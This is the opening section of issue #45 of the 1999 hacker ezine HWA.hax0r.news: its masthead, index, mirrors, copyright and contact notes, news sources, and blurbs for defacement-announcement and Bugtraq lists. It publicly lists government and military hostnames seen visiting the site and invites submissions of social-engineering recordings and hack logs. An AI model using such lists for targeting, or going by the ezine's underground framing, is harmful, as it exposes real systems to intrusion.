💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn45.… captured on 2021-12-04 at 18:04:22.

View Raw

More Information

-=-=-=-=-=-=-

      
      [63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99/2000=]                   Number 45 Volume 1 1999   Dec 5th 99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================
   
   "This newsletter/ezine has been Declassified for the phearing impaired"  
   
   
                    ____
                   / ___|_____   _____ _ __ __ _  __ _  ___
                  | |   / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
                  | |__| (_) \ V /  __/ | | (_| | (_| |  __/
                   \____\___/ \_/ \___|_|  \__,_|\__, |\___|
                                                 |___/

                  This is #45 covering Nov 28th to Dec 5th. 
    
  ==========================================================================                             

                         "ABUSUS NON TOLLIT USUM"
                         
  ==========================================================================                         
    
   Mailing list members: 447 Can we bump this up somewhat? spread the word!                          
   
  ==========================================================================                          
   
  
        Today the spotlight may be on you, some interesting machines that
                  have accessed these archives recently...
               
                               _   _       _
                              | | | | ___ | |_
                              | |_| |/ _ \| __|
                              |  _  | (_) | |_
                              |_| |_|\___/ \__|
                               _    _ _ _
                              | |  | (_) |
                              | |__| |_| |_ ___
                              |  __  | | __/ __|
                              | |  | | | |_\__ \
                              |_|  |_|_|\__|___/
                              
                            .gov and .mil activity
                              
                             
                             
                             proxy.gintic.gov.sg
                             doegate.doe.gov
                             sunspot.gsfc.nasa.gov
                             gate1.mcbh.usmc.mil 
                             homer.nawcad.navy.mil
                             maggie.nawcad.navy.mil
                             lisa.nawcad.navy.mil 
                             msproxy.transcom.mil
                             b-kahuna.hickam.af.mil
                             sc034ws109.nosc.mil
                             infosec.se
                             gate2.mcbutler.usmc.mil
                             sc034ws109.nosc.mil
                             shq-ot-1178.nosc.mil
                             dhcp-036190.scott.af.mil
                             mcreed.lan.teale.ca.gov
                             dodo.nist.gov
                             mc1926.mcclellan.af.mil
                             kwai11.nsf.gov
                             enduser.faa.gov
                             vasfw02,fdic.gov 
                             lisa.defcen.gov.au
                             ps1.pbgc.gov
                             guardian.gov.sg
                             amccss229116.scott.af.mil
                             sc022ws224.nosc.mil
                             sheppard2.hurlburt.af.mil                             
                             marshall.us-state.gov
                             digger1.defence.gov.au
                             firewall.mendoza.gov.ar
                             ipaccess.gov.ru
                             gatekeeper.itsec-debis.de
                             fgoscs.itsec-debis.de
                             fhu-ed4ccdf.fhu.disa.mil
                             citspr.tyndall.af.mil
                             kelsatx2.kelly.af.mil
                             kane.sheppard.af.mil                             
                             relay5.nima.mil
                             host.198-76-34-33.gsa.gov
                             ntsrvr.vsw.navy.mil
                             saic2.nosc.mil
                             wygate.wy.blm.gov
                             mrwilson.lanl.gov
                             p722ar.npt.nuwc.navy.mil
                             ws088228.ramstein.af.mil
                             car-gw.defence.gov.au
                             unknown-c-23-147.latimes.com
                             nytgate1.nytimes.com
                             
                             
  There are some interesting machines among these, the *.nosc.mil boxes are
  from SPAWAR information warfare centres, good Is It Worth It Followup to see
  our boys keeping up with the news... - Ed                             
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
  
  _   ___        ___      _                 ___
 | | | \ \      / / \    | |__   __ ___  __/ _ \ _ __ _ __   _____      _____
 | |_| |\ \ /\ / / _ \   | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __|
 |  _  | \ V  V / ___ \ _| | | | (_| |>  <| |_| | |_ | | | |  __/\ V  V /\__ \
 |_| |_|  \_/\_/_/   \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/

  
                             
                             
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
                     http://welcome.to/HWA.hax0r.news/                     
                                           
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ 
  #                                                                         #
  @      The HWA website is sponsored by CUBESOFT communications I highly   @ 
  #      recommend you consider these people for your web hosting needs,    #
  @                                                                         @   
  #      Web site sponsored by CUBESOFT networks http://www.csoft.net       #
  @      check them out for great fast web hosting!                         @ 
  #                                                                         # 
  #      http://www.csoft.net/~hwa                                          @
  @                                                                         #  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
                    
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       


          _   _            _             _    _____ _   _     _
         | | | | __ _  ___| | _____ _ __( )__| ____| |_| |__ (_) ___
         | |_| |/ _` |/ __| |/ / _ \ '__|/ __|  _| | __| '_ \| |/ __|
         |  _  | (_| | (__|   <  __/ |   \__ \ |___| |_| | | | | (__
         |_| |_|\__,_|\___|_|\_\___|_|   |___/_____|\__|_| |_|_|\___|



     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a perjorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer, 
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.


  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       


             _____                          _   _   _
            |  ___|__  _ __ _ __ ___   __ _| |_| |_(_)_ __   __ _
            | |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` |
            |  _| (_) | |  | | | | | | (_| | |_| |_| | | | | (_| |
            |_|  \___/|_|  |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, |
                                                            |___/

               A Comment on FORMATTING: 
               
               
               Oct'99 - Started 80 column mode format, code is still left
                        untouched since formatting will destroy syntax.               
               
   
               I received an email recently about the formatting of this
               newsletter, suggesting that it be formatted to 75 columns
               in the past I've endevoured to format all text to 80 cols
               except for articles and site statements and urls which are
               posted verbatim, I've decided to continue with this method
               unless more people complain, the zine is best viewed in
               1024x768 mode with UEDIT.... - Ed
               
               BTW if anyone can suggest a better editor than UEDIT for
               this thing send me some email i'm finding it lacking in
               certain areas. Must be able to produce standard ascii.    
                       
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
                       __  __ _
                      |  \/  (_)_ __ _ __ ___  _ __ ___
                      | |\/| | | '__| '__/ _ \| '__/ __|
                      | |  | | | |  | | | (_) | |  \__ \
                      |_|  |_|_|_|  |_|  \___/|_|  |___/

                       


     New mirror sites
                
          ***   http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***      
                http://datatwirl.intranova.net * NEW * 
                http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
                http://net-security.org/hwahaxornews
                http://www.sysbreakers.com/hwa
                http://www.attrition.org/hosted/hwa/
                http://www.ducktank.net/hwa/issues.html.          
                http://hwazine.cjb.net/
                http://www.hackunlimited.com/files/secu/papers/hwa/
                http://www.attrition.org/~modify/texts/zines/HWA/       
                         
              * http://hwa.hax0r.news.8m.com/           
              * http://www.fortunecity.com/skyscraper/feature/103/  
               
              * Crappy free sites but they offer 20M & I need the space...
              ** Some issues are not located on these sites since they exceed
                 the file size limitations imposed by the sites :-( please
                 only use these if no other recourse is available.
                 
            *** Most likely to be up to date other than the main site.    
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.ducktank.net/hwa/issues.html. ** NEW **
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/ 
     http://www.digitalgeeks.com/hwa. *DOWN*
     http://members.tripod.com/~hwa_2k
     http://welcome.to/HWA.hax0r.news/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm

   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=         
   
   
  
 
                    ____                              _
                   / ___| _   _ _ __   ___  _ __  ___(_)___
                   \___ \| | | | '_ \ / _ \| '_ \/ __| / __|
                    ___) | |_| | | | | (_) | |_) \__ \ \__ \
                   |____/ \__, |_| |_|\___/| .__/|___/_|___/
                          |___/            |_|

     
   
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  compliment such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, its a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #44

   =-----------------------------------------------------------------------=


    
    We could use some more people joining the channel, its usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   
    
    **************************************************************************   

   
                            ____|  _|            |
                            __|   |   __ \   _ \ __|
                            |     __| |   |  __/ |
                           _____|_|  _|  _|\___|\__| 

     
                        Eris Free Net #HWA.hax0r.news
    
    **************************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed   ***
    ***                                                                    ***
    *** please join to discuss or impart news on from the zine and around  ***
    *** the zine or just to hang out, we get some interesting visitors you ***
    *** could be one of em.                                                ***
    ***                                                                    ***
    *** Note that the channel isn't there to entertain you its purpose is  ***
    *** to bring together people interested and involved in the underground***
    *** to chat about current and recent events etc, do drop in to talk or ***
    *** hangout. Also if you want to promo your site or send in news tips  ***
    *** its the place to be, just remember we're not #hack or #chatzone... ***
    **************************************************************************

      
    
    


  =--------------------------------------------------------------------------=
  
  
                     _____            _             _  
                    / ____|          | |           | |
                   | |     ___  _ __ | |_ ___ _ __ | |_ ___
                   | |    / _ \| '_ \| __/ _ \ '_ \| __/ __|
                   | |___| (_) | | | | ||  __/ | | | |_\__ \
                    \_____\___/|_| |_|\__\___|_| |_|\__|___/


           
  =--------------------------------------------------------------------------=
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................
            
             ABUSUS NON TOLLIT USUM? 
             This is (in case you hadn't guessed) Latin, and loosely translated
             it means "Just because something is abused, it should not be taken
             away from those  who use it properly). This is our new motto.         

  =--------------------------------------------------------------------------=
    Key     Content 
  =--------------------------------------------------------------------------=
  

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Yes It Is (Worth It) ............................................
    04.0  .. ExplorerZip Shrinks, Becomes MiniZip ............................
    05.0  .. Staples Files Suit Against Unknown Defacer ......................
    06.0  .. Comet bows to consumer pressure..................................
    07.0  .. Personal Info of Canadian ISP Users Leaked ......................
    08.0  .. First Internet Piracy Case in Japan .............................
    09.0  .. FBI Launches InfraGuard in Ohio .................................
    10.0  .. National Gun Database Goes Online ...............................
    11.0  .. Zero Knowledge Ships Freedom, Finally ...........................
    12.0  .. OpenBSD 2.6 Ships ...............................................
    13.0  .. Videon Was Warned of Data Loss ..................................
    14.0  .. German Digital Signature Chip Broke .............................
    15.0  .. IETF Members Under Investigation For Treason ....................
    16.0  .. Jane's Releases Cyberterrorism Report ...........................
    17.0  .. Car Radio Listening Habits Being Gathered .......................
    18.0  .. CVE by Mitre Goes Online ........................................
    19.0  .. Novell Head Victim of Online Credit Card Theft ..................
    20.0  .. IDC Says E-Commerce Unsafe Most of the Time .....................
    21.0  .. Attack Trees Help to Model Security Threats .....................
    22.0  .. Pandora Updated .................................................
    23.0  .. [sSh] Busted or Not?  ...........................................
    24.0  .. Response to Freedom Extraordinary ...............................
    25.0  .. DCypher.net Team Created ........................................
    26.0  .. Hackers Make it to Mars .........................................
    27.0  .. Security Focus newsletter #17....................................
    28.0  .. SQL 7 "Magic Packet" DoS.........................................
    
    =-------------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: POSTPONED til further notice, place: TBA..........
    Ha.Ha .. Humour and puzzles  ............................................
             
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99
     
     

     
 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
                            _                     _
                           | |    ___  __ _  __ _| |
                           | |   / _ \/ _` |/ _` | |
                           | |__|  __/ (_| | (_| | |
                           |_____\___|\__, |\__,_|_|
                                      |___/


          THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
          OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
          WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
          (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
          READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
          Important semi-legalese and license to redistribute:
     
          YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
          AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
          ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
          IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
          APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
          IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
          ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
          ME PRIVATELY current email cruciphux@dok.org
     
          THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
          WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
          THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
          I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
          AND REDISTRIBUTE/MIRROR. - EoD
     
     
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if its good enough for CNN its good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
     
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
     
         cruciphux@dok.org
     
         Cruciphux [C*:.]



 00.1 CONTACT INFORMATION AND MAIL DROP 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                     ____            _             _
                    / ___|___  _ __ | |_ __ _  ___| |_ ___
                   | |   / _ \| '_ \| __/ _` |/ __| __/ __|
                   | |__| (_) | | | | || (_| | (__| |_\__ \
                    \____\___/|_| |_|\__\__,_|\___|\__|___/


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:
    

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5
	    
	    
    
    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org                                                                   
    Distribution/Website........: sas2@usa.net       

    @HWA



 00.2 Sources ***
      ~~~~~~~~~~~
      
                      ____
                     / ___|  ___  _   _ _ __ ___ ___ ___
                     \___ \ / _ \| | | | '__/ __/ _ Y __|
                      ___) | (_) | |_| | | | (_|  __|__ \
                     |____/ \___/ \__,_|_|  \___\___|___/


     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) .....,............http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/ s
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
        

    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
            ____        _               _         _
           / ___| _   _| |__  _ __ ___ (_)___ ___(_) ___  _ __  ___
           \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
            ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
           |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/


    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care wether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
    
    
    ATTRITION.ORG's Website defacement mirror and announcement lists
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    http://www.attrition.org/mirror/attrition/    
    http://www.attrition.org/security/lists.html
    
    --
      
      defaced [web page defacement announce list]
      
      This is a public LOW VOLUME (1) mail list to circulate news/info on 
      defaced web sites. To subscribe to Defaced, send mail to 
      majordomo@attrition.org with "subscribe defaced" in the BODY of 
      the mail.
      
      There will be two types of posts to this list:
      
              1. brief announcements as we learn of a web defacement.
                 this will include the site, date, and who signed the 
                 hack. we will also include a URL of a mirror of the hack.
      
              2. at the end of the day, a summary will be posted
                 of all the hacks of the day. these can be found
                 on the mirror site listed under 'relevant links'
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: mcintyre@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
      (1) It is low volume on a normal day. On days of many defacements,
          traffic may be increased. On a few days, it is a virtual mail
          flood. You have been warned. ;)
      
    -=-
    
    --
      
      defaced summary [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced domains on a given day. To subscribe to Defaced-Summary, send mail to 
      majordomo@attrition.org with "subscribe defaced-summary" in the BODY of 
      the mail.
      
      There will be ONE type of post to this list:
      
              1. a single nightly piece of mail listing all reported
                 domains. the same information can be found on
                 http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
              
     -=-
     
      defaced GM [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced government and military domains on a given day. To subscribe to 
      Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" 
      in the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personell charged with tracking security incidents on
      government run networks.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
     
      --
      
      defaced alpha [web page defacement announce list]
      
      This is a low traffic mail list to announce via alpha-numeric
      pagers, all publicly defaced government and military domains 
      on a given day. To subscribe to Defaced-Alpha, send mail to 
      majordomo@attrition.org with "subscribe defaced-alpha" in 
      the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the information
                 will only include domain names. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personell charged with tracking security incidents on
      government run networks. Further, it is designed for 
      quick response and aimed at law enforcement agencies like
      DCIS and the FBI.
      
      To subscribe to this list, a special mail will be sent to YOUR
      alpha-numeric pager. A specific response must be made within
      12 hours of receiving the mail to be subscribed. If the response
      is not received, it is assumed the mail was not sent to your 
      pager.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
         
      
    -=-     
      

    


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

